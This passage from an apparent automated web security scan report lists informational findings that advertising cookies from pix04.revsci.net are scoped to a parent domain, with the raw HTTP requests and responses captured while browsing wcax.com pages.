Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq2qIGKEAWFhJ0QSlgYlQhEc6MiO0UzrToS2ouz039v0EpRxSyNYjSDalBGWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTDVdntzlNMPA0y2boUy5Y7voYnl6yfuLpEimlP0Vz1lb/RjUOi7bq4C75IyJ9opxCrX7etWJLMemJm1S0MAAhzke2cvgVu5WIe/YGfsp8J+o9uf07FPUtKpgVTwfiUnECc+6tU9t1bIy34gP5vFQ9MLExPBaUzGkSiNfYaEM=; rtc_qH7k=MLsv8SUucA5nprADo8Nq7dG30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFOpPrNSkm1eU9Lpin2x9jJdbuKtNkElLVE051AluTuDnRDieHkyvaZNMAKnMOnxWWEt8Bj2ZwKECyW0ZU/wYMurf3oH/xJXerILxH/z3W8t0as+z/3fJ8azYrm12OFroSv3dkRCrzSdbJ66D0Dt9pfio56UesBj+1SLyZM8fJnR4MNTI0wzO41bbP1Wws8UaQ/4AuRitULgKokR7aSBTL/fY/adIXHS4s1pNFsz2sFWsx5QC99bfHaXZ4zQpVwoJJzZTD9kvrdMDCgOltk2DQT2lKk0FDcxaMKw7/KxVDLSlk+RBRhjcN1Xj/tWNoaFV9sbtoigkBD83eZUXFOzMKJ6uEXoIZDzkIGr0PoLrM+t2W7ciP0X6oF/RXzuO7qRtCJao66pQ0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qH7k=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50mBb3IQT7uItGE2XZ+BegxW06NpBWaN1BDoY9v5vw/Z0o0s9uNg2v9kDss6IrN6JaGAHSmROtUTwMbYBi9rjjj9HIlKSoiQkCQtivyaNS7jlRvuw2D0aUM8HqYeBaSkzgIPkJtKzgPSBYiT8mIKXc9qOf3x8FTXKZXGtj75c9yYA2gNT8xdMKeaKHqlgzQfACMdS8qviDrP1XXXVqf4Jtikz7mDvPXWENiHlBqaAaDH5SSTvxqtMy2Fr3gcck84B/fhC1+A/zQA0P4EM5L8kozQV3oP2NUKPO6wg85NJ5N7yUnU/8+4mOZYgY6B; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:00 GMT; Path=/
Set-Cookie: rtc_EM4g=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNtwB34ZoQt95cCo91UbMwGaFSr6asrq672fdH+xzIkZMRNy3EgFEOFuAASeQu0Vmfb3m3aVzU53rLUI0DvmE+6V5MRfJFqiXP3mwBN1JQOHtAvauFYtPfu791mq8kh/67bj1dtkYfONjJz46HXLiLXT9vUqTOR8dIMLhwh5QgSMzCmH/uFvWfD3l3pX8QaFC1vCAqFk8T34QxWHhhMKOHgnb4Ef8/sjmrJ7cwLNcYjHKHaF1zK4a+nl+D77j2; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:00 GMT; Path=/
X-Proc-ms: 23
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 13:15:59 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
5.109. http://pix04.revsci.net/E05511/b3/0/3/0902121/316223818.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/316223818.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/316223818.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D398823%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJkOBL3IQVvUbea77UACbRIFnakVmUA+HR+nmRzxcnjU8Au/noS2ouxUK6pw26Doqi/RzbzhgLhbB0DMyapLQzeT2x4D8v6WaOTFPmqLoHRbjefGo5DRhBJWpmMATsNqLrrq2mc21v8NBpMun4I8+oSRke9cSEdXcu+3veueFcBzDVkpF+v8Ch970caAscd6hxtvZsT7ppt7+S6XInEFBmseHYrM+6D3jHgWuSeWBaFjcqMvd3fn6QLIxauWdjEYgS+pGwFdssGkY+qrdhwpzkfSpvrWEETsLafzEAfG1fx9zowU5mvPKnaGXmg==; rtc_QEfD=MLsv8SUucA5nprAD264UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0OQE4KL99Qp8zilVvFLegxD/FKzZzKAFPPXNSkm1eU9Lpin0xxgsRv18t9kElLVE051AluTuDnRDieHkOf9TCWukp+fyOVqRG+FbypZ1lOmeCoTp4pvl4W2xqmQFAWY4P5lr/3fAt0as+z/3c58a0YrmF2CFroRB+arCLp2/A/hlSL3YhoR/5MNsKutYjoQwhJscXN5vRZ/qEN/s+mTleYT1e0XRQJw7SG6Pb2foVCrRD5zlxI6M9xB55wUh10H6ft0R/IG6wmIogiyFxbz9L/rVYw1C4gDlVZ0sYCbRWJ8laUnjTGKqfAWyeIdxhd2ou3ym15NGUzxTHSbE3gGfUiwP1c7Rn8JWxY041sNP9IpNYh6qgR92imO/5zl3mFWhFNjp7cfhWA2MYorGw1uHV11zKR6Oij8mYbuD

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_QEfD=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq8maNy+QEHhmUA+HR+nmR+wNkracs3b0+sttkvcnG4FQF1YFME4zlfRD4gH9GEcK40FJegXl+5D8vFQar78P9XhIAzqXffGoRAe2X6QrAftrLLzt4AOKq3/LIjvpHS425/AXqL0pwSuIw13EQH79I3WYhxGSmqQ5v+WDhpEaaEAgtHJ6pKXCfyjkfbaXvAhJilWkfBI9ACFC8OoPrFURlqw8t7yAaDCXuToKNVaHV881VmBTFipN3Fw6sL/kNO6Dj/PrFkjVxaxh866sfh+Na3Jm2FDom4UcKgaKXBGXnA==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:15 GMT; Path=/
Set-Cookie: rtc_7rob=MLsv7iMucD5npqgDC0e9A9S30MEszwLosfaz5fWZ65hV2fUeqlt8L6cj/qSrEX5/s8WnsS00IKdsJuIlbI0n6i5mCFMCk/DX0ZUZhQNOqEqv6ZJx9H7x4sWwa0LKdLu6EDs2kZV8061wlsTiDnxDiSHnPc+ZMsR67OfyuVuRW+F5iRkzlcSm/OepgsdXo88JhULWLh4a8A6PyDf903KoAeUpitP4N3NHYKrDRno2A2G7cKcnRxKVxwMcXyZShLrki39i5R2d0TDalpcI3lQLOzWjSjYjgqHDlwIgVLwfpXxffwb2O+079hdYhGZkfhCjDm663gi652dE4tuvo0Wk6TBEetIB0B851bjeN97FHa1+AcoTzJ7vr9miJTCPeFwcdknuxboNaAb30giKRMoAYZA4YbUzrt9+lX/Y4xR8j5Zql80uS1MWG+qf2bN9oL3Kb6AfYwp9dbQvTTz1fmKCvi1xxnAWV3rx4+GReBq6rIo=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:15 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:38:15 GMT
Content-Length: 593

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
5.110. http://pix04.revsci.net/E05511/b3/0/3/0902121/354226275.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/354226275.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/354226275.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18197%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV594t637ir85zA1Wc7IaEiIBFXxvHO1ZKic5ngYCBQF0q7tfEV6W8KaQp8dAvSusER0hEoZjgIoA2FbRoQEvNoVutDtItom6EzbfSVHF/SxGtsi7JLpXBbxV4+nFIdqzXHgEf9oWZ5RJC3ujSffAwU6kkmlxpZkNgKVDxHs2h6ZgtVUmsdob5hq0Nqcqao5UL6XWdwSFR8rKSfMbsG8gfniLsWRrEUd/iiaO7e2qi1BJoGWx3uN5y/9erGbqkBIWdtK9ieRmJ7990bPhloxqouJEJEY=; rtc_JX9b=MLsvrlMusR9jJhHokT9c+IVabtHZzAlfbNtEAmBKZKi5zmNwJhnNeeI4S3b9+hGezmW6Ln0geKBlbrcD9OYDgK5xvRPSmd7E1skkGXtt39bVkBro3/pDJa7WtDpg0n9cK4HLy4PHUYL1qMfvwh6zBTmD3Tq9NcAIrEtRlTLPCVbK4plliAKP6Y1urMVfrK62r1eudYR8l3obNBin+Or1YJCSDLQfDawKE9I3kayv/2L6/OC7EWPIBhcON6NJ0bIQqRR3v9/Y746x7pnadu2KsTdZy9q2LOFaWoIJtemMbkH1yuBwAb2guPh/3EOUW7OJX/dQmLFuaLrE4L2+pzoJlemdndndT5pL3c6dEK1xmqH5NqHj7jqZ3mTtgdw9hH6MmWCujWIOFzZ+sL6cffx50HMJYddjfuKz2MX0KrTWut04fMIbTsVx2/63U4IAYZhnA8KXaw==; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JX9b=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDO6ETU6ge19nKCDeVRxV0pPvV/yUINBxjwRSIohEK6pw26DoqIz+utPOu4WWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAjOlM2xcQOksDHwXF2Fqgcy5SfDDVrBFONjAMusqbzpvfiwUgkDpQKdICnPofZ0FXwrodLaUb+r1rjWhgCA2Nye/XTLzFcKnkSlZ20bnJkJ2lCVKM67FdTd5TpTfsM3PTq9Msu+BrJVix0x9rmPJ08w7B68DW1uHow==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:52 GMT; Path=/
Set-Cookie: rtc_VLqa=MLsv8VUucT5jZiikOEcU9ETXogUC0zg5ozNC5TZsQpoZ1XM0c3poC/S8o6gL3dmLNudZyUEHBSAy9DbqYRishsAluZLfFyPHoW8OnSeutlPGT/9/yatZEYhKP0fsjK91LGefXs0IFtIUglN4VvEbdB94gnJik9VR3JwBRtB0k+C4P5UtnEKeKpV1g0Rv83740nXMV7YE/uPDtQFbm0Q8eV1Zd0GXuQK0nT7WirXZJe/V8mV9ZUoEyHl5odcfSkb+K6JNo78s6B8lVwS+1OK8yjE3ld42puQDa4oRtNPsj+tg+8uNeC31TvLQNYMxtN08pZU9Wwz7+Y02P0GKlzuW58YZ2ax+coZLrUgBLDwxwmi/FcTAEueywLNduv7UFNzWsaqmVoy0obcSI0s1HsFhhRgiluSuLojCnYPs3wnFuu3sguAbpZ24bo2l84IPd51AxF5VgN5/; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:52 GMT; Path=/
X-Proc-ms: 25
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:52 GMT
Content-Length: 503

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','E05511_10424','D08734_72076','D08734_72077','D08734_72082'
...[SNIP]...
5.111. http://pix04.revsci.net/E05511/b3/0/3/0902121/64495114.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/64495114.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/64495114.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D452989%2526affname%253DWCAX%2526adtag%253DPromotion%252525201%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D189321%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
